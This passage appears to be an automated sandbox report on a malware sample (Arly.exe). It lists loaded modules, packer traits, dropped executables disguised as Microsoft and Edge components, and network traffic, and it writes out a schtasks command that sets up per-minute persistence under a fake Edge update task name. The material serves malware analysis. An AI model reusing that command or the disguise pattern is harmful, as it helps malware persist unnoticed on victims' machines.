                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: dwrite.dll
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: msvcp140_clr0400.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: Arly.exeStatic PE information: More than 8191 > 100 exports found
                              Source: Arly.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: Arly.exeStatic file information: File size 57788393 > 1048576
                              Source: Arly.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xe04c00
                              Source: Arly.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2809000
                              Source: Arly.exeStatic PE information: More than 200 imports for KERNEL32.dll
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: Arly.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Arly.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Arly.exe, 00000000.00000000.1266638136.000000000336D000.00000002.00000001.01000000.00000003.sdmp
                              Source: Arly.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: Arly.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: Arly.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: Arly.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: Arly.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                              Source: bctuwcvcqvnxbyc.exe.0.drStatic PE information: 0x9043C5D6 [Wed Sep 12 10:24:22 2046 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .themida
                              Source: wxrctnzmvurnezy.exe.0.drStatic PE information: section name: .xdata
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name: .themida
                              Source: uqqqtttivubuibr.exe.0.drStatic PE information: section name: _RDATA
                              Source: RuntimeBroker.exe.37.drStatic PE information: section name: _RDATA
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_009310F9 push FFFFFF82h; iretd 33_3_009310FB
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_009344F9 push edx; retf 33_3_009344FC
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_009328EC push edi; ret 33_3_009328F8
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00932C39 push ecx; ret 33_3_00932C59
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_0093525D push es; ret 33_3_00935264
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00933F89 push edi; iretd 33_3_00933F96
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00933FD4 push ss; retf 33_3_00933FF5
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_009321DC push eax; ret 33_3_009321DD
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00934D5E push esi; ret 33_3_00934D69
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_3_00930F6A push eax; ret 33_3_00930F75
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_009310F9 push FFFFFF82h; iretd 33_2_009310FB
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_009344F9 push edx; retf 33_2_009344FC
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_009328EC push edi; ret 33_2_009328F8
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00932C39 push ecx; ret 33_2_00932C59
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_0093525D push es; ret 33_2_00935264
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00933F89 push edi; iretd 33_2_00933F96
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00933FD4 push ss; retf 33_2_00933FF5
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_009321DC push eax; ret 33_2_009321DD
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00934D5E push esi; ret 33_2_00934D69
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeCode function: 33_2_00930F6A push eax; ret 33_2_00930F75
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeCode function: 34_2_00007FFC3D08021D push E95E4498h; ret 34_2_00007FFC3D080259
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeCode function: 37_2_00007FF7C95D17BD push rcx; iretd 37_2_00007FF7C95D17BE
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeCode function: 37_2_00007FF7C95D2EAD push rdi; retf 37_2_00007FF7C95D2EB6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFC3D0719BA pushad ; ret 40_2_00007FFC3D0719C9
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B2CB9 push ecx; ret 61_3_008B2CD9
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B52DD push es; ret 61_3_008B52E4
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B4009 push edi; iretd 61_3_008B4016
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B225C push eax; ret 61_3_008B225D
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B4054 push ss; retf 61_3_008B4075
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B4DDE push esi; ret 61_3_008B4DE9
                              Source: C:\Windows\SysWOW64\svchost.exeCode function: 61_3_008B0FEA push eax; ret 61_3_008B0FF5
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name: entropy: 7.985393389809318
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeFile created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 3000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 3000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49719
                              Source: C:\Users\user\Desktop\Arly.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
